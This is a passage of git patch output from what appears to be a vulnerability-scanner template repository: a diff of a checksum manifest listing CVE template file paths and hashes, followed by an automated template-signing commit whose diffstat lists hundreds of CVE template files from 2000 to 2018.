http/cves/2024/CVE-2024-23334.yaml:c7735b96c11cb5fb87ede7ad978c21a2e2bb2bbe -http/cves/2024/CVE-2024-2340.yaml:bf15cb04b444f7c09b0602e12e9bb3c77cd7ecf7 +http/cves/2024/CVE-2024-2340.yaml:8b4e6176085fd2e23294d24fe4ad16623e6c04d2 http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07 -http/cves/2024/CVE-2024-23917.yaml:91acf4a916db564da116aad3221f1a662477c3ed -http/cves/2024/CVE-2024-24131.yaml:71f3b885b69ae4e2beffc8df3a036dcfc75a8cba -http/cves/2024/CVE-2024-24919.yaml:6e739858871f091c64f572ebffcb7df982653993 +http/cves/2024/CVE-2024-23917.yaml:30e3c4167ab654c921a0099ca71173f3aaa4efb6 +http/cves/2024/CVE-2024-24131.yaml:92521d7f06cc522caf757cf4955580a6ce81f11c +http/cves/2024/CVE-2024-24919.yaml:dc70da2422a62df9120e90019f4b177f82b9637a http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:970b706816344e71cfc971f7e2b69be44296cd81 -http/cves/2024/CVE-2024-25735.yaml:f7694e6ddea1f334810c1f92161b65fe17c5881c -http/cves/2024/CVE-2024-26331.yaml:b6da693b9295d093562406851e50dedfe5a136c9 -http/cves/2024/CVE-2024-27198.yaml:2dd81bcb6348757082509db91768889a3725f1e2 +http/cves/2024/CVE-2024-25735.yaml:6cb37a640b41863066cfcc9d917f6da3bca178ef +http/cves/2024/CVE-2024-26331.yaml:09399db8fb7ac4ae716c9b1d7a25a73727288132 +http/cves/2024/CVE-2024-27198.yaml:ef5197d6f52235dfa22a237ec3ba7b1dfdaf5492 http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d http/cves/2024/CVE-2024-27497.yaml:60398b33810f93340a2641b108c2ed83ed635e88 http/cves/2024/CVE-2024-27564.yaml:59fbfb7c059d110b9a807d0d2205058ae1326e6b http/cves/2024/CVE-2024-27954.yaml:fe69ea721d3341747af165f3378e4f8bedb2ff43 -http/cves/2024/CVE-2024-27956.yaml:6642a8487441523926a0828c54b333ba9737522f -http/cves/2024/CVE-2024-28255.yaml:dd2f4a52d0d4f9af3c6a6fc10a917e99e8f0717d -http/cves/2024/CVE-2024-28734.yaml:a21288b4f390a5aea56ed3660da93b8fed589096 +http/cves/2024/CVE-2024-27956.yaml:183826f7991890e37661f393a43e76714418b327 +http/cves/2024/CVE-2024-28255.yaml:4e37fca1899d0664c6cc28b4d4ce66301db56ab2 +http/cves/2024/CVE-2024-28734.yaml:c947ad89f7a1c41c08be582fe05bfaf52e52784b http/cves/2024/CVE-2024-2876.yaml:33b7f45b1e5e63e6936315618a667d8cd07d054b -http/cves/2024/CVE-2024-2879.yaml:b49dbdd0903b4812334dfdb5d99c2c128b750841 -http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a -http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc -http/cves/2024/CVE-2024-3097.yaml:4185bbc6b136c6f1674cf35e66d4c4142e75bb0e -http/cves/2024/CVE-2024-3136.yaml:5fed158063381326ca7336af0dc0c43ed317883d +http/cves/2024/CVE-2024-2879.yaml:1682b1027f2599bfed61d6922b4ad1e7af2963e7 +http/cves/2024/CVE-2024-29059.yaml:f36dad1af1afa0f510ee81e4cd653d23223988e8 +http/cves/2024/CVE-2024-29269.yaml:5a971a5e38e628cd7af595e83ff531ad9b912694 +http/cves/2024/CVE-2024-3097.yaml:061fb056a1993b992d863ec26cd78d368fe58473 +http/cves/2024/CVE-2024-3136.yaml:f41042c96e9dbb187c897bfb9b4fd4b0a82ca732 http/cves/2024/CVE-2024-31621.yaml:d0336b01545c56f67a5ee9a174f52e660861e3bc -http/cves/2024/CVE-2024-31848.yaml:0d6172ae416d3a1de4e4cabcccdb4e102f2ca440 -http/cves/2024/CVE-2024-31849.yaml:38ee32ca8fe1a5378feb218852477eb6460e62ea -http/cves/2024/CVE-2024-31850.yaml:e6fdbf6bb6829c0afd6fa7027b68b859f301d1ba +http/cves/2024/CVE-2024-31848.yaml:784556c618c53d8d471b21fc04f3a040cc96f492 +http/cves/2024/CVE-2024-31849.yaml:d34bdd05da8c050a14fe72bb8dc7f54e45242250 +http/cves/2024/CVE-2024-31850.yaml:9ad703db727ec444a5579104f225275e1e626ddf http/cves/2024/CVE-2024-31851.yaml:75629a1e21a26e599dce39fcf8272cf24236cacf -http/cves/2024/CVE-2024-32399.yaml:afc357068e3f6e9ef3aa6910a122ee7bd47ac60d +http/cves/2024/CVE-2024-32399.yaml:e7baf7a6e22f175cc2f3b236ef68853cdf814506 http/cves/2024/CVE-2024-32640.yaml:0aea7a618e8eba9f193f25c129d1d03e3bb15921 http/cves/2024/CVE-2024-32651.yaml:644d79d1e5be106386851b644d904c48a003d4b5 -http/cves/2024/CVE-2024-3273.yaml:a3f9f69c4c7f4f6e45f66d06fead2fb61338db17 +http/cves/2024/CVE-2024-3273.yaml:14cd3a5d8b64e3e05dccebedbebc95045bcfdc2d http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab -http/cves/2024/CVE-2024-33575.yaml:ad19d994ed8f29c8ffca72103c5419713853271b -http/cves/2024/CVE-2024-33724.yaml:22f067dc8bffa65e58284ba200cb9d7abb06d0d0 -http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c +http/cves/2024/CVE-2024-33575.yaml:cffffecf77c06ef57f987b130b2e8f28dd272b19 +http/cves/2024/CVE-2024-33724.yaml:620bb7553b4cef24c012f5a3a3655c0ee8146c78 +http/cves/2024/CVE-2024-3400.yaml:2bd600db500bb43b0afc7d7e694df41eeceb143f http/cves/2024/CVE-2024-34470.yaml:a5518a2ed26dd99303e2e20f7356eece7f2dc927 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 -http/cves/2024/CVE-2024-3822.yaml:e70a67d151ade654abc8ca4a6bc9d296073d6123 -http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 -http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b +http/cves/2024/CVE-2024-3822.yaml:3b09a61773b3f696a26e7a152cfa5d1968aa9dc8 +http/cves/2024/CVE-2024-4040.yaml:0ec0a0dcbc9149db436ec147018574d574f45b25 +http/cves/2024/CVE-2024-4348.yaml:bbab477b0fd48166cf20c7a11b381830042bc34d http/cves/2024/CVE-2024-4956.yaml:a00f92400517494320ec968d237c98bb1056de25 http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 @@ -8614,7 +8614,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:7699d41e3854e2471b4942f0947e77c3fb0259ea +templates-checksum.txt:6eb1cefac9f148d20991468437446ac844aca82d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 5e8cb13b60c3776a35ae57d1cf81963416b4782f Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 1 Jun 2024 06:53:00 +0000 Subject: [PATCH 1642/1768] Auto Template Signing [Sat Jun 1 06:52:59 UTC 2024] :robot: --- http/cves/2000/CVE-2000-0114.yaml | 2 +- http/cves/2001/CVE-2001-0537.yaml | 2 +- http/cves/2002/CVE-2002-1131.yaml | 2 +- http/cves/2004/CVE-2004-1965.yaml | 2 +- http/cves/2005/CVE-2005-3344.yaml | 2 +- http/cves/2005/CVE-2005-3634.yaml | 2 +- http/cves/2006/CVE-2006-2842.yaml | 2 +- http/cves/2007/CVE-2007-0885.yaml | 2 +- http/cves/2007/CVE-2007-3010.yaml | 2 +- http/cves/2007/CVE-2007-4504.yaml | 2 +- http/cves/2007/CVE-2007-4556.yaml | 2 +- http/cves/2007/CVE-2007-5728.yaml | 2 +- http/cves/2008/CVE-2008-1061.yaml | 2 +- http/cves/2008/CVE-2008-1547.yaml | 2 +- http/cves/2008/CVE-2008-2650.yaml | 2 +- http/cves/2008/CVE-2008-4764.yaml | 2 +- http/cves/2008/CVE-2008-5587.yaml | 2 +- http/cves/2008/CVE-2008-6080.yaml | 2 +- http/cves/2008/CVE-2008-6172.yaml | 2 +- http/cves/2008/CVE-2008-6222.yaml | 2 +- http/cves/2008/CVE-2008-6465.yaml | 2 +- http/cves/2008/CVE-2008-6668.yaml | 2 +- http/cves/2008/CVE-2008-7269.yaml | 2 +- http/cves/2009/CVE-2009-0545.yaml | 2 +- http/cves/2009/CVE-2009-0932.yaml | 2 +- http/cves/2009/CVE-2009-1151.yaml | 2 +- http/cves/2009/CVE-2009-1872.yaml | 2 +- http/cves/2009/CVE-2009-2100.yaml | 2 +- http/cves/2009/CVE-2009-3318.yaml | 2 +- http/cves/2009/CVE-2009-4202.yaml | 2 +- http/cves/2009/CVE-2009-4223.yaml | 2 +- http/cves/2009/CVE-2009-5020.yaml | 2 +- http/cves/2010/CVE-2010-0157.yaml | 2 +- http/cves/2010/CVE-2010-0219.yaml | 2 +- http/cves/2010/CVE-2010-0467.yaml | 2 +- http/cves/2010/CVE-2010-0759.yaml | 2 +- http/cves/2010/CVE-2010-0942.yaml | 2 +- http/cves/2010/CVE-2010-0972.yaml | 2 +- http/cves/2010/CVE-2010-1081.yaml | 2 +- http/cves/2010/CVE-2010-1305.yaml | 2 +- http/cves/2010/CVE-2010-1306.yaml | 2 +- http/cves/2010/CVE-2010-1307.yaml | 2 +- http/cves/2010/CVE-2010-1308.yaml | 2 +- http/cves/2010/CVE-2010-1312.yaml | 2 +- http/cves/2010/CVE-2010-1313.yaml | 2 +- http/cves/2010/CVE-2010-1353.yaml | 2 +- http/cves/2010/CVE-2010-1354.yaml | 2 +- http/cves/2010/CVE-2010-1429.yaml | 2 +- http/cves/2010/CVE-2010-1461.yaml | 2 +- http/cves/2010/CVE-2010-1469.yaml | 2 +- http/cves/2010/CVE-2010-1471.yaml | 2 +- http/cves/2010/CVE-2010-1473.yaml | 2 +- http/cves/2010/CVE-2010-1474.yaml | 2 +- http/cves/2010/CVE-2010-1476.yaml | 2 +- http/cves/2010/CVE-2010-1494.yaml | 2 +- http/cves/2010/CVE-2010-1532.yaml | 2 +- http/cves/2010/CVE-2010-1533.yaml | 2 +- http/cves/2010/CVE-2010-1534.yaml | 2 +- http/cves/2010/CVE-2010-1535.yaml | 2 +- http/cves/2010/CVE-2010-1602.yaml | 2 +- http/cves/2010/CVE-2010-1607.yaml | 2 +- http/cves/2010/CVE-2010-1653.yaml | 2 +- http/cves/2010/CVE-2010-1657.yaml | 2 +- http/cves/2010/CVE-2010-1659.yaml | 2 +- http/cves/2010/CVE-2010-1715.yaml | 2 +- http/cves/2010/CVE-2010-1718.yaml | 2 +- http/cves/2010/CVE-2010-1723.yaml | 2 +- http/cves/2010/CVE-2010-1870.yaml | 2 +- http/cves/2010/CVE-2010-1952.yaml | 2 +- http/cves/2010/CVE-2010-1953.yaml | 2 +- http/cves/2010/CVE-2010-1955.yaml | 2 +- http/cves/2010/CVE-2010-1956.yaml | 2 +- http/cves/2010/CVE-2010-1957.yaml | 2 +- http/cves/2010/CVE-2010-1977.yaml | 2 +- http/cves/2010/CVE-2010-1982.yaml | 2 +- http/cves/2010/CVE-2010-2036.yaml | 2 +- http/cves/2010/CVE-2010-2037.yaml | 2 +- http/cves/2010/CVE-2010-2050.yaml | 2 +- http/cves/2010/CVE-2010-2507.yaml | 2 +- http/cves/2010/CVE-2010-2680.yaml | 2 +- http/cves/2010/CVE-2010-2861.yaml | 2 +- http/cves/2010/CVE-2010-2918.yaml | 2 +- http/cves/2010/CVE-2010-3203.yaml | 2 +- http/cves/2010/CVE-2010-4231.yaml | 2 +- http/cves/2010/CVE-2010-4239.yaml | 2 +- http/cves/2010/CVE-2010-4282.yaml | 2 +- http/cves/2010/CVE-2010-4977.yaml | 2 +- http/cves/2010/CVE-2010-5028.yaml | 2 +- http/cves/2010/CVE-2010-5278.yaml | 2 +- http/cves/2010/CVE-2010-5286.yaml | 2 +- http/cves/2011/CVE-2011-0049.yaml | 2 +- http/cves/2011/CVE-2011-2744.yaml | 2 +- http/cves/2011/CVE-2011-2780.yaml | 2 +- http/cves/2011/CVE-2011-4336.yaml | 2 +- http/cves/2011/CVE-2011-4640.yaml | 2 +- http/cves/2011/CVE-2011-4804.yaml | 2 +- http/cves/2011/CVE-2011-4926.yaml | 2 +- http/cves/2011/CVE-2011-5106.yaml | 2 +- http/cves/2011/CVE-2011-5181.yaml | 2 +- http/cves/2011/CVE-2011-5265.yaml | 2 +- http/cves/2012/CVE-2012-0392.yaml | 2 +- http/cves/2012/CVE-2012-0394.yaml | 2 +- http/cves/2012/CVE-2012-0896.yaml | 2 +- http/cves/2012/CVE-2012-0901.yaml | 2 +- http/cves/2012/CVE-2012-0981.yaml | 2 +- http/cves/2012/CVE-2012-0991.yaml | 2 +- http/cves/2012/CVE-2012-0996.yaml | 2 +- http/cves/2012/CVE-2012-1226.yaml | 2 +- http/cves/2012/CVE-2012-1823.yaml | 2 +- http/cves/2012/CVE-2012-1835.yaml | 2 +- http/cves/2012/CVE-2012-2371.yaml | 2 +- http/cves/2012/CVE-2012-3153.yaml | 2 +- http/cves/2012/CVE-2012-4242.yaml | 2 +- http/cves/2012/CVE-2012-4273.yaml | 2 +- http/cves/2012/CVE-2012-4547.yaml | 2 +- http/cves/2012/CVE-2012-4768.yaml | 2 +- http/cves/2012/CVE-2012-4878.yaml | 2 +- http/cves/2012/CVE-2012-4889.yaml | 2 +- http/cves/2012/CVE-2012-4982.yaml | 2 +- http/cves/2012/CVE-2012-5321.yaml | 2 +- http/cves/2012/CVE-2012-5913.yaml | 2 +- http/cves/2012/CVE-2012-6499.yaml | 2 +- http/cves/2013/CVE-2013-1965.yaml | 2 +- http/cves/2013/CVE-2013-2248.yaml | 2 +- http/cves/2013/CVE-2013-2251.yaml | 2 +- http/cves/2013/CVE-2013-2287.yaml | 2 +- http/cves/2013/CVE-2013-3526.yaml | 2 +- http/cves/2013/CVE-2013-3827.yaml | 2 +- http/cves/2013/CVE-2013-4117.yaml | 2 +- http/cves/2013/CVE-2013-4625.yaml | 2 +- http/cves/2013/CVE-2013-5979.yaml | 2 +- http/cves/2013/CVE-2013-6281.yaml | 2 +- http/cves/2013/CVE-2013-7091.yaml | 2 +- http/cves/2013/CVE-2013-7240.yaml | 2 +- http/cves/2014/CVE-2014-1203.yaml | 2 +- http/cves/2014/CVE-2014-2321.yaml | 2 +- http/cves/2014/CVE-2014-2323.yaml | 2 +- http/cves/2014/CVE-2014-2383.yaml | 2 +- http/cves/2014/CVE-2014-2908.yaml | 2 +- http/cves/2014/CVE-2014-2962.yaml | 2 +- http/cves/2014/CVE-2014-3120.yaml | 2 +- http/cves/2014/CVE-2014-3744.yaml | 2 +- http/cves/2014/CVE-2014-4210.yaml | 2 +- http/cves/2014/CVE-2014-4536.yaml | 2 +- http/cves/2014/CVE-2014-4539.yaml | 2 +- http/cves/2014/CVE-2014-4558.yaml | 2 +- http/cves/2014/CVE-2014-4561.yaml | 2 +- http/cves/2014/CVE-2014-4940.yaml | 2 +- http/cves/2014/CVE-2014-5258.yaml | 2 +- http/cves/2014/CVE-2014-6271.yaml | 2 +- http/cves/2014/CVE-2014-6287.yaml | 2 +- http/cves/2014/CVE-2014-8676.yaml | 2 +- http/cves/2014/CVE-2014-8682.yaml | 2 +- http/cves/2014/CVE-2014-8799.yaml | 2 +- http/cves/2014/CVE-2014-9180.yaml | 2 +- http/cves/2014/CVE-2014-9444.yaml | 2 +- http/cves/2014/CVE-2014-9606.yaml | 2 +- http/cves/2014/CVE-2014-9607.yaml | 2 +- http/cves/2014/CVE-2014-9608.yaml | 2 +- http/cves/2014/CVE-2014-9614.yaml | 2 +- http/cves/2014/CVE-2014-9617.yaml | 2 +- http/cves/2014/CVE-2014-9618.yaml | 2 +- http/cves/2015/CVE-2015-1000005.yaml | 2 +- http/cves/2015/CVE-2015-1427.yaml | 2 +- http/cves/2015/CVE-2015-1503.yaml | 2 +- http/cves/2015/CVE-2015-1579.yaml | 2 +- http/cves/2015/CVE-2015-1635.yaml | 2 +- http/cves/2015/CVE-2015-1880.yaml | 2 +- http/cves/2015/CVE-2015-2068.yaml | 2 +- http/cves/2015/CVE-2015-2080.yaml | 2 +- http/cves/2015/CVE-2015-2166.yaml | 2 +- http/cves/2015/CVE-2015-2196.yaml | 2 +- http/cves/2015/CVE-2015-2755.yaml | 2 +- http/cves/2015/CVE-2015-2807.yaml | 2 +- http/cves/2015/CVE-2015-2996.yaml | 2 +- http/cves/2015/CVE-2015-3035.yaml | 2 +- http/cves/2015/CVE-2015-3224.yaml | 2 +- http/cves/2015/CVE-2015-3337.yaml | 2 +- http/cves/2015/CVE-2015-4050.yaml | 2 +- http/cves/2015/CVE-2015-4062.yaml | 2 +- http/cves/2015/CVE-2015-4074.yaml | 2 +- http/cves/2015/CVE-2015-4127.yaml | 2 +- http/cves/2015/CVE-2015-4455.yaml | 2 +- http/cves/2015/CVE-2015-4632.yaml | 2 +- http/cves/2015/CVE-2015-4666.yaml | 2 +- http/cves/2015/CVE-2015-4668.yaml | 2 +- http/cves/2015/CVE-2015-4694.yaml | 2 +- http/cves/2015/CVE-2015-5461.yaml | 2 +- http/cves/2015/CVE-2015-5471.yaml | 2 +- http/cves/2015/CVE-2015-5531.yaml | 2 +- http/cves/2015/CVE-2015-5688.yaml | 2 +- http/cves/2015/CVE-2015-7245.yaml | 2 +- http/cves/2015/CVE-2015-7297.yaml | 2 +- http/cves/2015/CVE-2015-7377.yaml | 2 +- http/cves/2015/CVE-2015-7450.yaml | 2 +- http/cves/2015/CVE-2015-7780.yaml | 2 +- http/cves/2015/CVE-2015-7823.yaml | 2 +- http/cves/2015/CVE-2015-8813.yaml | 2 +- http/cves/2015/CVE-2015-9312.yaml | 2 +- http/cves/2015/CVE-2015-9323.yaml | 2 +- http/cves/2015/CVE-2015-9480.yaml | 2 +- http/cves/2016/CVE-2016-0957.yaml | 2 +- http/cves/2016/CVE-2016-1000126.yaml | 2 +- http/cves/2016/CVE-2016-1000127.yaml | 2 +- http/cves/2016/CVE-2016-1000131.yaml | 2 +- http/cves/2016/CVE-2016-1000133.yaml | 2 +- http/cves/2016/CVE-2016-1000137.yaml | 2 +- http/cves/2016/CVE-2016-1000138.yaml | 2 +- http/cves/2016/CVE-2016-1000141.yaml | 2 +- http/cves/2016/CVE-2016-1000142.yaml | 2 +- http/cves/2016/CVE-2016-1000148.yaml | 2 +- http/cves/2016/CVE-2016-1000149.yaml | 2 +- http/cves/2016/CVE-2016-1000154.yaml | 2 +- http/cves/2016/CVE-2016-1000155.yaml | 2 +- http/cves/2016/CVE-2016-10033.yaml | 2 +- http/cves/2016/CVE-2016-10108.yaml | 2 +- http/cves/2016/CVE-2016-10134.yaml | 2 +- http/cves/2016/CVE-2016-10367.yaml | 2 +- http/cves/2016/CVE-2016-10368.yaml | 2 +- http/cves/2016/CVE-2016-10924.yaml | 2 +- http/cves/2016/CVE-2016-10956.yaml | 2 +- http/cves/2016/CVE-2016-10973.yaml | 2 +- http/cves/2016/CVE-2016-10993.yaml | 2 +- http/cves/2016/CVE-2016-1555.yaml | 2 +- http/cves/2016/CVE-2016-2389.yaml | 2 +- http/cves/2016/CVE-2016-3081.yaml | 2 +- http/cves/2016/CVE-2016-3088.yaml | 2 +- http/cves/2016/CVE-2016-3978.yaml | 2 +- http/cves/2016/CVE-2016-4975.yaml | 2 +- http/cves/2016/CVE-2016-5674.yaml | 2 +- http/cves/2016/CVE-2016-6195.yaml | 2 +- http/cves/2016/CVE-2016-7552.yaml | 2 +- http/cves/2016/CVE-2016-7981.yaml | 2 +- http/cves/2016/CVE-2016-8527.yaml | 2 +- http/cves/2017/CVE-2017-0929.yaml | 2 +- http/cves/2017/CVE-2017-1000028.yaml | 2 +- http/cves/2017/CVE-2017-1000029.yaml | 2 +- http/cves/2017/CVE-2017-10075.yaml | 2 +- http/cves/2017/CVE-2017-10271.yaml | 2 +- http/cves/2017/CVE-2017-11165.yaml | 2 +- http/cves/2017/CVE-2017-11444.yaml | 2 +- http/cves/2017/CVE-2017-11512.yaml | 2 +- http/cves/2017/CVE-2017-11610.yaml | 2 +- http/cves/2017/CVE-2017-12138.yaml | 2 +- http/cves/2017/CVE-2017-12149.yaml | 2 +- http/cves/2017/CVE-2017-12544.yaml | 2 +- http/cves/2017/CVE-2017-12583.yaml | 2 +- http/cves/2017/CVE-2017-12611.yaml | 2 +- http/cves/2017/CVE-2017-12615.yaml | 2 +- http/cves/2017/CVE-2017-12617.yaml | 2 +- http/cves/2017/CVE-2017-12629.yaml | 2 +- http/cves/2017/CVE-2017-12635.yaml | 2 +- http/cves/2017/CVE-2017-12637.yaml | 2 +- http/cves/2017/CVE-2017-12794.yaml | 2 +- http/cves/2017/CVE-2017-14135.yaml | 2 +- http/cves/2017/CVE-2017-14186.yaml | 2 +- http/cves/2017/CVE-2017-14524.yaml | 2 +- http/cves/2017/CVE-2017-14535.yaml | 2 +- http/cves/2017/CVE-2017-14622.yaml | 2 +- http/cves/2017/CVE-2017-14651.yaml | 2 +- http/cves/2017/CVE-2017-14849.yaml | 2 +- http/cves/2017/CVE-2017-15715.yaml | 2 +- http/cves/2017/CVE-2017-15944.yaml | 2 +- http/cves/2017/CVE-2017-16806.yaml | 2 +- http/cves/2017/CVE-2017-16877.yaml | 2 +- http/cves/2017/CVE-2017-17043.yaml | 2 +- http/cves/2017/CVE-2017-17059.yaml | 2 +- http/cves/2017/CVE-2017-17451.yaml | 2 +- http/cves/2017/CVE-2017-17562.yaml | 2 +- http/cves/2017/CVE-2017-17736.yaml | 2 +- http/cves/2017/CVE-2017-18024.yaml | 2 +- http/cves/2017/CVE-2017-18487.yaml | 2 +- http/cves/2017/CVE-2017-18490.yaml | 2 +- http/cves/2017/CVE-2017-18491.yaml | 2 +- http/cves/2017/CVE-2017-18492.yaml | 2 +- http/cves/2017/CVE-2017-18493.yaml | 2 +- http/cves/2017/CVE-2017-18494.yaml | 2 +- http/cves/2017/CVE-2017-18496.yaml | 2 +- http/cves/2017/CVE-2017-18500.yaml | 2 +- http/cves/2017/CVE-2017-18501.yaml | 2 +- http/cves/2017/CVE-2017-18502.yaml | 2 +- http/cves/2017/CVE-2017-18505.yaml | 2 +- http/cves/2017/CVE-2017-18516.yaml | 2 +- http/cves/2017/CVE-2017-18517.yaml | 2 +- http/cves/2017/CVE-2017-18518.yaml | 2 +- http/cves/2017/CVE-2017-18527.yaml | 2 +- http/cves/2017/CVE-2017-18528.yaml | 2 +- http/cves/2017/CVE-2017-18529.yaml | 2 +- http/cves/2017/CVE-2017-18530.yaml | 2 +- http/cves/2017/CVE-2017-18532.yaml | 2 +- http/cves/2017/CVE-2017-18536.yaml | 2 +- http/cves/2017/CVE-2017-18537.yaml | 2 +- http/cves/2017/CVE-2017-18542.yaml | 2 +- http/cves/2017/CVE-2017-18556.yaml | 2 +- http/cves/2017/CVE-2017-18557.yaml | 2 +- http/cves/2017/CVE-2017-18558.yaml | 2 +- http/cves/2017/CVE-2017-18562.yaml | 2 +- http/cves/2017/CVE-2017-18564.yaml | 2 +- http/cves/2017/CVE-2017-18565.yaml | 2 +- http/cves/2017/CVE-2017-18566.yaml | 2 +- http/cves/2017/CVE-2017-18598.yaml | 2 +- http/cves/2017/CVE-2017-18638.yaml | 2 +- http/cves/2017/CVE-2017-3506.yaml | 2 +- http/cves/2017/CVE-2017-3528.yaml | 2 +- http/cves/2017/CVE-2017-4011.yaml | 2 +- http/cves/2017/CVE-2017-5631.yaml | 2 +- http/cves/2017/CVE-2017-5638.yaml | 2 +- http/cves/2017/CVE-2017-5689.yaml | 2 +- http/cves/2017/CVE-2017-6090.yaml | 2 +- http/cves/2017/CVE-2017-7269.yaml | 2 +- http/cves/2017/CVE-2017-7391.yaml | 2 +- http/cves/2017/CVE-2017-7615.yaml | 2 +- http/cves/2017/CVE-2017-7855.yaml | 2 +- http/cves/2017/CVE-2017-7921.yaml | 2 +- http/cves/2017/CVE-2017-7925.yaml | 2 +- http/cves/2017/CVE-2017-8917.yaml | 2 +- http/cves/2017/CVE-2017-9140.yaml | 2 +- http/cves/2017/CVE-2017-9416.yaml | 2 +- http/cves/2017/CVE-2017-9506.yaml | 2 +- http/cves/2017/CVE-2017-9791.yaml | 2 +- http/cves/2017/CVE-2017-9805.yaml | 2 +- http/cves/2017/CVE-2017-9822.yaml | 2 +- http/cves/2017/CVE-2017-9833.yaml | 2 +- http/cves/2018/CVE-2018-0127.yaml | 2 +- http/cves/2018/CVE-2018-1000129.yaml | 2 +- http/cves/2018/CVE-2018-1000130.yaml | 2 +- http/cves/2018/CVE-2018-1000226.yaml | 2 +- http/cves/2018/CVE-2018-1000533.yaml | 2 +- http/cves/2018/CVE-2018-1000671.yaml | 2 +- http/cves/2018/CVE-2018-1000856.yaml | 2 +- http/cves/2018/CVE-2018-1000861.yaml | 2 +- http/cves/2018/CVE-2018-10141.yaml | 2 +- http/cves/2018/CVE-2018-10230.yaml | 2 +- http/cves/2018/CVE-2018-10562.yaml | 2 +- http/cves/2018/CVE-2018-10735.yaml | 2 +- http/cves/2018/CVE-2018-10736.yaml | 2 +- http/cves/2018/CVE-2018-10737.yaml | 2 +- http/cves/2018/CVE-2018-10738.yaml | 2 +- http/cves/2018/CVE-2018-10823.yaml | 2 +- http/cves/2018/CVE-2018-10942.yaml | 2 +- http/cves/2018/CVE-2018-10956.yaml | 2 +- http/cves/2018/CVE-2018-11227.yaml | 2 +- http/cves/2018/CVE-2018-11409.yaml | 2 +- http/cves/2018/CVE-2018-11473.yaml | 2 +- http/cves/2018/CVE-2018-11709.yaml | 2 +- http/cves/2018/CVE-2018-11759.yaml | 2 +- http/cves/2018/CVE-2018-11776.yaml | 2 +- http/cves/2018/CVE-2018-11784.yaml | 2 +- http/cves/2018/CVE-2018-12031.yaml | 2 +- http/cves/2018/CVE-2018-12296.yaml | 2 +- http/cves/2018/CVE-2018-12300.yaml | 2 +- http/cves/2018/CVE-2018-12613.yaml | 2 +- http/cves/2018/CVE-2018-12634.yaml | 2 +- http/cves/2018/CVE-2018-12675.yaml | 2 +- http/cves/2018/CVE-2018-1271.yaml | 2 +- http/cves/2018/CVE-2018-1335.yaml | 2 +- http/cves/2018/CVE-2018-13379.yaml | 2 +- http/cves/2018/CVE-2018-13380.yaml | 2 +- http/cves/2018/CVE-2018-13980.yaml | 2 +- http/cves/2018/CVE-2018-14013.yaml | 2 +- http/cves/2018/CVE-2018-14474.yaml | 2 +- http/cves/2018/CVE-2018-14574.yaml | 2 +- http/cves/2018/CVE-2018-14912.yaml | 2 +- http/cves/2018/CVE-2018-14916.yaml | 2 +- http/cves/2018/CVE-2018-14918.yaml | 2 +- http/cves/2018/CVE-2018-14931.yaml | 2 +- http/cves/2018/CVE-2018-15517.yaml | 2 +- http/cves/2018/CVE-2018-15535.yaml | 2 +- http/cves/2018/CVE-2018-15745.yaml | 2 +- http/cves/2018/CVE-2018-15917.yaml | 2 +- http/cves/2018/CVE-2018-15961.yaml | 2 +- http/cves/2018/CVE-2018-16139.yaml | 2 +- http/cves/2018/CVE-2018-16159.yaml | 2 +- http/cves/2018/CVE-2018-16167.yaml | 2 +- http/cves/2018/CVE-2018-16283.yaml | 2 +- http/cves/2018/CVE-2018-16288.yaml | 2 +- http/cves/2018/CVE-2018-16716.yaml | 2 +- http/cves/2018/CVE-2018-16761.yaml | 2 +- http/cves/2018/CVE-2018-16763.yaml | 2 +- http/cves/2018/CVE-2018-16836.yaml | 2 +- http/cves/2018/CVE-2018-16979.yaml | 2 +- http/cves/2018/CVE-2018-17153.yaml | 2 +- http/cves/2018/CVE-2018-17246.yaml | 2 +- http/cves/2018/CVE-2018-17254.yaml | 2 +- http/cves/2018/CVE-2018-17422.yaml | 2 +- http/cves/2018/CVE-2018-18264.yaml | 2 +- http/cves/2018/CVE-2018-18323.yaml | 2 +- http/cves/2018/CVE-2018-18570.yaml | 2 +- http/cves/2018/CVE-2018-18608.yaml | 2 +- http/cves/2018/CVE-2018-18777.yaml | 2 +- http/cves/2018/CVE-2018-18778.yaml | 2 +- http/cves/2018/CVE-2018-18809.yaml | 2 +- http/cves/2018/CVE-2018-18925.yaml | 2 +- http/cves/2018/CVE-2018-19137.yaml | 2 +- http/cves/2018/CVE-2018-19287.yaml | 2 +- http/cves/2018/CVE-2018-19326.yaml | 2 +- http/cves/2018/CVE-2018-19365.yaml | 2 +- http/cves/2018/CVE-2018-19386.yaml | 2 +- http/cves/2018/CVE-2018-19439.yaml | 2 +- http/cves/2018/CVE-2018-19458.yaml | 2 +- http/cves/2018/CVE-2018-19749.yaml | 2 +- http/cves/2018/CVE-2018-19752.yaml | 2 +- http/cves/2018/CVE-2018-19753.yaml | 2 +- http/cves/2018/CVE-2018-19914.yaml | 2 +- 